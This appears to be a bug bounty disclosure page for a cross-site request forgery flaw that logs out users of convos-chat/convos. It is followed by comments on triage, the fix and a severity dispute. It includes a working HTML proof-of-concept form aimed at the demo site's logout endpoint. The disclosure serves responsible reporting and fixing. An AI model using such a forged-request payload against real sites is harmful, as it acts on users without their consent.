Cross-Site Request Forgery (CSRF) in convos-chat/convos

Valid

Reported on

Dec 11th 2021


Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.convos.chat/logout">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability is capable of forging users to unintentional logout.

More Detail

One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the convos-chat/convos team within 24 hours. 2 months ago
Devendra Bhatla
2 months ago

Researcher


@admin Please contact on contact@convos.chat to the maintainer.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
Jamie Slome
a month ago

Admin


@dev696 - I have commented on the GitHub Issue! I have shared the report URL with them if they want to view the report directly. Otherwise, once they have added an e-mail to the SECURITY.md, they will receive a magic link to access the page.

Devendra Bhatla
a month ago

Researcher


@Jamie, I believe we can considered the shared email "contact@convos.chat" You can share all the details as this is the main contact. Also the URL is private and cannot be viewed. Thanks for your support as always.

We have contacted a member of the convos-chat/convos team and are waiting to hear back a month ago
Jamie Slome
a month ago

Admin


Sorted! ūüéä

A convos-chat/convos maintainer validated this vulnerability a month ago
Devendra Bhatla has been awarded the disclosure bounty
The fix bounty is now up for grabs
A convos-chat/convos maintainer confirmed that a fix has been merged on a2d265 a month ago
The fix bounty has been dropped
ChatSidebar.svelte#L233 has been validated
A convos-chat/convos maintainer
a month ago

Maintainer


Thanks for reporting this through e-mail, instead of posting it online before having a chance to fix it.

I did consider this a minor issue. I think even bigger sites like Google also does not protect the /logout endpoint. Nevertheless, the fix was simple to add, so why not? :)

KhanhCM
a month ago

Hey @dev696,

A real researcher will not just copy all the content from other reports. You should try to write your reports by yourself.

Furthermore, the severity for this vulnerability is not High, it's Medium (CVSS from 4.3 to 6.5, maybe). You can check it on some reports or CVEs. The convos' s users will be shocked if they know that their app has a High vulnerability with the impact is just logging out a user with no affected on the account, just an annoyance!